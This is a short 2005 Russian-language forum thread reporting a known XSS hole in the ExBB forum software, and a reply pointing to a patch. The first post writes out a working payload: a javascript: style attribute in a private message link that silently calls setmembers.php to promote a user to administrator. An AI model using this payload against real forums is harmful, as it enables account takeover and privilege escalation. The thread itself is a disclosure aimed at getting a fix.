ТвойWeb :: Версия для печати :: Дыра в коде форума

1. AlexXx - 01 Апреля, 2005 - 14:37:07 - перейти к сообщению

Возможно,эта проблема уже обсуждалась,но тем не менее:
любой пользователь форума ExBB может получить права администратора
путём отправки ему личного сообщения,содержащего ccылку,включающую
в себя следующие строки:

CODE:

'style='background:url(javascript:document.images[0].src="<Директория с форумом>/setmembers.php?action=edit_user&checkaction=yes&userid=84&membertitle=&emailaddress=lol@lol.
ru&newname=Alexxx&password=&homepage=&aolname=&icqnumber=&location=
&interests=&signature=&numberofposts=0&avatar=noavatar.gif&membercode=
ad&submit=%CE%F2%EF%F0%E0%E2%E8%F2%FC")'

Т.е. методом XSS застравляем браузер думать что он грузит картинку, а на самом деле он открывает линк на редактирование профиля и повышения его до админа.

Дайте,пожалуйста, линк на заплатку,если таковая существует...

2. TvoyWeb - 01 Апреля, 2005 - 15:16:47 - перейти к сообщению

AlexXx пишет:

Возможно,эта проблема уже обсуждалась,но тем не менее:

Обсуждалось и не раз. Надо учиться пользоваться поиском.
Заплатки ищи на www.exbb.net
Кстати в архивах с файлами форума уже есть эта заплатка.